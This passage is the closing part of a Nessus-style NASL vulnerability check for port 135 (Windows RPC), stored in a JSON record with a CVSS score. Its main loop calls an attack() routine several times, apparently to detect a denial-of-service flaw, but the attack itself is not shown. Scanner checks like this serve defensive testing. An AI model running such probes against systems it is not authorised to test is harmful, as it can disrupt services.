close(soc);\n return (0);\n}\n\n\n#\n# The main program.\n#\n\nport = 135;\n\nif (!get_port_state(port)) {\n exit(0);\n}\n\nmaxtries = 5;\ncountdown = maxtries;\n\nwhile (countdown > 0) {\n success = attack(port:port);\n if (success) {\n if (countdown == maxtries) {\n # XXX it refuses to talk to us\n # XXX should we print a warning?\n exit(0);\n }\n security_warning(port);\n exit(0);\n }\n countdown = countdown - 1;\n sleep(1);\n}\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}]}